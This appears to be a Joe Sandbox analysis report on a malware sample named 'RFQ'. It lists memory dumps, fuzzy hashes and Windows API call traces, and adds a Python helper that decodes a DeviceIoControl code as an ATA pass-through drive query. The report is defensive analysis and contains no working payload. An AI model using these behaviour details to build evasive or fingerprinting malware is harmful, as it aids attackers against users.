• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Type$FileFreeLibraryLoadModuleNameRegister
• String ID:
• API String ID: 3137044355-0
• Opcode ID: c323dc340b1510e5446eeb7c78c626df2195b453d920525e3ad052724ffafb9b
• Instruction ID: e5346c6af8bb7179970847740e325b80d69dca71a7f710ba8d6d62b7946ab176
• Opcode Fuzzy Hash: c323dc340b1510e5446eeb7c78c626df2195b453d920525e3ad052724ffafb9b
• Instruction Fuzzy Hash: DE217C71900209EFDF208FA5DC98EDABBB8EF40780F00C569E51AD2050E778EA55DFA1
APIs
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00776733
• _memset.LIBCMT ref: 00776754
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007767A6
• CloseHandle.KERNEL32(00000000), ref: 007767AF
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle_memset
• String ID:
• API String ID: 1157408455-0
• Opcode ID: 34b3dc0dbe5987438af5dca775e0338fbaa556879b4121e5de471d31f5e35c68
• Instruction ID: 49930d27f671b47d7ad6a293b0c9b2027efff35e16ff88be4e9ab0912a769e5f
• Opcode Fuzzy Hash: 34b3dc0dbe5987438af5dca775e0338fbaa556879b4121e5de471d31f5e35c68
• Instruction Fuzzy Hash: 2111CD759012287AD7305765AC4DFDB7ABCEF44764F104196F508E71D0D2744E408BA4
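The CreateFileW/DeviceIoControl pair in the block above is easier to read once the numeric arguments are decoded. Under the CTL_CODE encoding from winioctl.h, control code 0004D02C splits into device type 0x4 (FILE_DEVICE_CONTROLLER, the IOCTL_SCSI_BASE), function 0x40B, METHOD_BUFFERED and read/write access, which is IOCTL_ATA_PASS_THROUGH from ntddscsi.h; the handle was opened with GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE and OPEN_EXISTING, as one does on a \\.\PhysicalDrive object. The 0x200-byte buffers are consistent with an ATA IDENTIFY DEVICE query (512 bytes of identify data), the usual user-mode way to read a drive's model and serial number, but the trace shows only the IOCTL, not the ATA command inside the request buffer, so that part is an inference. The decoder below is an added example written for this report, not code from Joe Sandbox or from the sample: the helper names and the small table of known storage IOCTLs are ours, and the two trace lines it parses are copied from the block above.

```python
"""Decode the numeric arguments of a CreateFileW -> DeviceIoControl pair taken
from a sandbox API trace.  Added example; helper names are ours, not Joe
Sandbox's or the sample's."""
import re
from typing import NamedTuple, Optional

# --- winioctl.h encoding ---------------------------------------------------
# CTL_CODE(DeviceType, Function, Method, Access)
#   = (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
METHOD_BUFFERED = 0
FILE_ANY_ACCESS, FILE_READ_ACCESS, FILE_WRITE_ACCESS = 0, 1, 2
FILE_DEVICE_CONTROLLER, FILE_DEVICE_DISK, FILE_DEVICE_MASS_STORAGE = 0x4, 0x7, 0x2D
METHOD_NAMES = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
                2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """The CTL_CODE macro from winioctl.h."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


_RW = FILE_READ_ACCESS | FILE_WRITE_ACCESS
# A few storage IOCTLs (ntddscsi.h / ntdddisk.h / ntddstor.h) rebuilt with the
# macro, so the table is derived from the same encoding it is matched against.
KNOWN_IOCTLS = {
    ctl_code(FILE_DEVICE_CONTROLLER, 0x0401, METHOD_BUFFERED, _RW): "IOCTL_SCSI_PASS_THROUGH",
    ctl_code(FILE_DEVICE_CONTROLLER, 0x0402, METHOD_BUFFERED, _RW): "IOCTL_SCSI_MINIPORT",
    ctl_code(FILE_DEVICE_CONTROLLER, 0x0405, METHOD_BUFFERED, _RW): "IOCTL_SCSI_PASS_THROUGH_DIRECT",
    ctl_code(FILE_DEVICE_CONTROLLER, 0x040A, METHOD_BUFFERED, _RW): "IOCTL_IDE_PASS_THROUGH",
    ctl_code(FILE_DEVICE_CONTROLLER, 0x040B, METHOD_BUFFERED, _RW): "IOCTL_ATA_PASS_THROUGH",
    ctl_code(FILE_DEVICE_CONTROLLER, 0x040C, METHOD_BUFFERED, _RW): "IOCTL_ATA_PASS_THROUGH_DIRECT",
    ctl_code(FILE_DEVICE_DISK, 0x0000, METHOD_BUFFERED, FILE_ANY_ACCESS): "IOCTL_DISK_GET_DRIVE_GEOMETRY",
    ctl_code(FILE_DEVICE_DISK, 0x0022, METHOD_BUFFERED, _RW): "SMART_RCV_DRIVE_DATA",
    ctl_code(FILE_DEVICE_MASS_STORAGE, 0x0420, METHOD_BUFFERED, FILE_ANY_ACCESS): "IOCTL_STORAGE_GET_DEVICE_NUMBER",
    ctl_code(FILE_DEVICE_MASS_STORAGE, 0x0500, METHOD_BUFFERED, FILE_ANY_ACCESS): "IOCTL_STORAGE_QUERY_PROPERTY",
}


class Ioctl(NamedTuple):
    device_type: int
    access: int
    function: int
    method: str
    name: str


def decode_ioctl(code: int) -> Ioctl:
    """Split a control code into its CTL_CODE fields and name it if known."""
    return Ioctl(device_type=(code >> 16) & 0xFFFF,
                 access=(code >> 14) & 0x3,
                 function=(code >> 2) & 0xFFF,
                 method=METHOD_NAMES[code & 0x3],
                 name=KNOWN_IOCTLS.get(code, "unknown"))


# --- CreateFileW argument decoding -----------------------------------------
GENERIC_BITS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_BITS = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


def bits_to_names(value: int, table: dict) -> str:
    return "|".join(n for bit, n in table.items() if value & bit) or "0"


# --- parsing the report's trace lines ---------------------------------------
_TRACE_RE = re.compile(r"(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)")


def parse_trace_line(line: str) -> Optional[dict]:
    """Parse 'Api.MODULE(arg,arg,...), ref: addr'; unknown '?' args become None."""
    m = _TRACE_RE.search(line)
    if not m:
        return None
    api, module, args, ref = m.groups()
    parsed = [None if a.strip() == "?" else int(a, 16) for a in args.split(",")]
    return {"api": api, "module": module, "args": parsed, "ref": int(ref, 16)}


def summarize(lines) -> dict:
    """Pair the CreateFileW open with the DeviceIoControl issued on it."""
    out = {}
    for rec in filter(None, map(parse_trace_line, lines)):
        a = rec["args"]
        if rec["api"] == "CreateFileW":      # (name, access, share, sa, disposition, flags, template)
            out["access"] = bits_to_names(a[1], GENERIC_BITS)
            out["share"] = bits_to_names(a[2], SHARE_BITS)
            out["disposition"] = DISPOSITION.get(a[4], hex(a[4]))
        elif rec["api"] == "DeviceIoControl":  # (h, code, in, inSize, out, outSize, ret, ovl)
            out["ioctl"] = decode_ioctl(a[1])
            out["in_size"], out["out_size"] = a[3], a[5]
    return out


# The two lines below are copied from the API trace in this report.
TRACE = [
    "CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00776733",
    "DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007767A6",
]

if __name__ == "__main__":
    for key, value in summarize(TRACE).items():
        print(f"{key:>12}: {value}")
```

Running it against the two copied lines reports GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING, and IOCTL_ATA_PASS_THROUGH with 512-byte in/out buffers. Codes not in the small table still decode into their four fields, which is usually enough to place them in the right header (device type 0x4 is the SCSI/ATA family, 0x7 disk, 0x2D storage class) before looking up the function number.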
APIs
  • Part of subcall function 0076AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0076AA79
  • Part of subcall function 0076AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0076AA83
  • Part of subcall function 0076AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0076AA92
  • Part of subcall function 0076AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0076AA99
  • Part of subcall function 0076AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0076AAAF
• GetLengthSid.ADVAPI32(?,00000000,0076ADE4,?,?), ref: 0076B21B
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 0076B227
• HeapAlloc.KERNEL32(00000000), ref: 0076B22E
• CopySid.ADVAPI32(?,00000000,?), ref: 0076B247
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
• String ID:
• API String ID: 4217664535-0
• Opcode ID: 3dbf45c8501f59037fc2985be56577adada7534f1046b18b13c987fb866855b9
• Instruction ID: aeaffca939272b52db931636161329c97d9765a695d3f12346d63b6d939f63a2
• Opcode Fuzzy Hash: 3dbf45c8501f59037fc2985be56577adada7534f1046b18b13c987fb866855b9
• Instruction Fuzzy Hash: 4A113072A00205EFDB149F98DC95AAEB7E9FF85314B14806DE943E7211D7399E84DB10
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 0076B498
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 0076B4AA
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 0076B4C0
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 0076B4DB
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: a5248288cb0860008302f983528fc0cd2741564e8352c5232ec10f8cada8c187
• Instruction ID: 472e082d7f2f4553977e83bd16e28256f449e1e6e6fa2122e97da0c201dcdb41
• Opcode Fuzzy Hash: a5248288cb0860008302f983528fc0cd2741564e8352c5232ec10f8cada8c187
• Instruction Fuzzy Hash: 3611487A900218FFDB11DFA8C885E9DBBB8FB09740F204091EA05B7290DB71AE51DB94
APIs
  • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
• DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0074B5A5
• GetClientRect.USER32(?,?), ref: 007AE69A
• GetCursorPos.USER32(?), ref: 007AE6A4
• ScreenToClient.USER32(?,?), ref: 007AE6AF
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: bad787180dfb1576f4ed71f63d608ca96fcc07618cfac2baa1ebb502defc4da9
• Instruction ID: 68f3a30159900391b4442a8bfec41efe8b65742e93d42baf5154e00bf4f3998b
• Opcode Fuzzy Hash: bad787180dfb1576f4ed71f63d608ca96fcc07618cfac2baa1ebb502defc4da9
• Instruction Fuzzy Hash: 6C11F83150002AFBCB20AFA4DD499AEB7B9EF49305F504555E901E6140D738AEA1CBA5
APIs
• GetCurrentThreadId.KERNEL32 ref: 00777352
• MessageBoxW.USER32(?,?,?,?), ref: 00777385
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0077739B
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 007773A2
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: 48f5c102e6e80116bb54e6d1e663bb11221c27bf297aaa6948f0314c36af318c
• Instruction ID: f9904c31da63ee4688a96df8399b188cd22b755dc9eca5d426bf2679823c52f8
• Opcode Fuzzy Hash: 48f5c102e6e80116bb54e6d1e663bb11221c27bf297aaa6948f0314c36af318c
• Instruction Fuzzy Hash: 86110872A04244AFCB059B6CDC09FEE7BADAB45350F04C325F925D3261E6788D00C7A4
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0074D1BA
• GetStockObject.GDI32(00000011), ref: 0074D1CE
• SendMessageW.USER32(00000000,00000030,00000000), ref: 0074D1D8
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
• Opcode ID: 3b21bb226e203b483612b19f35c76a213dbea212cf798d566ca8499fe0c46e2d
• Instruction ID: 3ba5f362c1d0338bc9f60eddbb3a46cf98b1cec08a8845d4cbee20a517f40d4d
• Opcode Fuzzy Hash: 3b21bb226e203b483612b19f35c76a213dbea212cf798d566ca8499fe0c46e2d
• Instruction Fuzzy Hash: 5D11AD7250150DBFEF224F90DC54EEABB6AFF09364F054216FE5452050DB399C60DBA0
APIs
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
• Instruction ID: cf39c48c20e075eed44b6977dd3ab5213121c994b7fd5fadb8ad4e7d07c2082c
• Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
• Instruction Fuzzy Hash: 9E01363200014AFBCF165E94DC158EE3F22BB18354F588455FE2A59121D33BCAB2AB81
APIs
  • Part of subcall function 00757A0D: __getptd_noexit.LIBCMT ref: 00757A0E
• __lock.LIBCMT ref: 0075748F
• InterlockedDecrement.KERNEL32(?), ref: 007574AC
• _free.LIBCMT ref: 007574BF
• InterlockedIncrement.KERNEL32(010326F0), ref: 007574D7
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
• String ID:
• API String ID: 2704283638-0
• Opcode ID: a3b04e95890227af7a6d29cd1c7ed60bcfa3e45ef1fe0e857f4ddde5791f6362
• Instruction ID: b5821b324ad57626b91d0ff9a645060bc7be598eab9a35576673eabf764a5e27
• Opcode Fuzzy Hash: a3b04e95890227af7a6d29cd1c7ed60bcfa3e45ef1fe0e857f4ddde5791f6362
• Instruction Fuzzy Hash: D601C4319066A1E7D729AF29B44DBDDBB60BF08723F158005FC1467690C7AC6909CFD6
APIs
• _memset.LIBCMT ref: 0079E33D
• _memset.LIBCMT ref: 0079E34C
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007F3D00,007F3D44), ref: 0079E37B
• CloseHandle.KERNEL32 ref: 0079E38D
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
• API ID: _memset$CloseCreateHandleProcess
• String ID:
• API String ID: 3277943733-0
• Opcode ID: 4d104417ec0918bdbdb2a621e7abe2fe24f77c268e3bd2725a30ec0b677d323d
• Instruction ID: 78a278ab1b6c1ad1e853e48d85dca85e23504df3ef8a8168c2b68d8664279dfd
• Opcode Fuzzy Hash: 4d104417ec0918bdbdb2a621e7abe2fe24f77c268e3bd2725a30ec0b677d323d
• Instruction Fuzzy Hash: EBF03AF1740304BAE2105B60AC49FB77A6CDB04754F008421BE08DA2A2D27D9E0086A8
APIs
  • Part of subcall function 0074AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0074AFE3
  • Part of subcall function 0074AF83: SelectObject.GDI32(?,00000000), ref: 0074AFF2
  • Part of subcall function 0074AF83: BeginPath.GDI32(?), ref: 0074B009
  • Part of subcall function 0074AF83: SelectObject.GDI32(?,00000000), ref: 0074B033
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0079EA8E
• LineTo.GDI32(00000000,?,?), ref: 0079EA9B
• EndPath.GDI32(00000000), ref: 0079EAAB
• StrokePath.GDI32(00000000), ref: 0079EAB9
Memory Dump Source
• Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
• Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
Similarity
                                                                                                                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1539411459-0
                                                                                                                                                    • Opcode ID: 1d29f659d608912dc14c96db4b9e8067fc0e6e9548ef11c58b36f90e4388bbb4
                                                                                                                                                    • Instruction ID: 5b4cbb3e60bf43d1f074eece8d756259020f7ebaca6abe66e057460b241f26e2
                                                                                                                                                    • Opcode Fuzzy Hash: 1d29f659d608912dc14c96db4b9e8067fc0e6e9548ef11c58b36f90e4388bbb4
                                                                                                                                                    • Instruction Fuzzy Hash: F1F05E3104525ABBDB22AF94AC0DFDA3F19AF16311F08C201FA11610E1977D9951CB9E
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0076C84A
                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0076C85D
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0076C864
                                                                                                                                                    • AttachThreadInput.USER32(00000000), ref: 0076C86B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2710830443-0
                                                                                                                                                    • Opcode ID: 11a0342447d2bead0e0d9e3a7d002b7bdb9a92de5f2cfb9a40f544776d9e4b58
                                                                                                                                                    • Instruction ID: 9f74b4c18b4035031829efb3be4708bd905264439e8e994d5ee6e2408fd066dc
                                                                                                                                                    • Opcode Fuzzy Hash: 11a0342447d2bead0e0d9e3a7d002b7bdb9a92de5f2cfb9a40f544776d9e4b58
                                                                                                                                                    • Instruction Fuzzy Hash: 6FE06D71141228BADB311BA2DC0DFEB7F1CEF067A1F40C121BA0E95460E6B9C980CBE0
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 0076B0D6
                                                                                                                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,0076AC9D), ref: 0076B0DD
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0076AC9D), ref: 0076B0EA
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,0076AC9D), ref: 0076B0F1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3974789173-0
                                                                                                                                                    • Opcode ID: c70dc806f3e7f42b6ca7e83c1731bf2fcf6646d9621f7ae99377d4b94539f71e
                                                                                                                                                    • Instruction ID: 92a61cdf6be449bb07f49404b6c957082ebf171556cc9d1e65d9b88ce5d4ae00
                                                                                                                                                    • Opcode Fuzzy Hash: c70dc806f3e7f42b6ca7e83c1731bf2fcf6646d9621f7ae99377d4b94539f71e
                                                                                                                                                    • Instruction Fuzzy Hash: 9AE04F366412129BD7302FB15D0CF873BACAF55791F01C928EA42D6040EA6C98418B64
                                                                                                                                                    APIs
                                                                                                                                                    • GetSysColor.USER32(00000008), ref: 0074B496
                                                                                                                                                    • SetTextColor.GDI32(?,000000FF), ref: 0074B4A0
                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0074B4B5
                                                                                                                                                    • GetStockObject.GDI32(00000005), ref: 0074B4BD
                                                                                                                                                    • GetWindowDC.USER32(?,00000000), ref: 007ADE2B
                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 007ADE38
                                                                                                                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 007ADE51
                                                                                                                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 007ADE6A
                                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 007ADE8A
                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 007ADE95
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
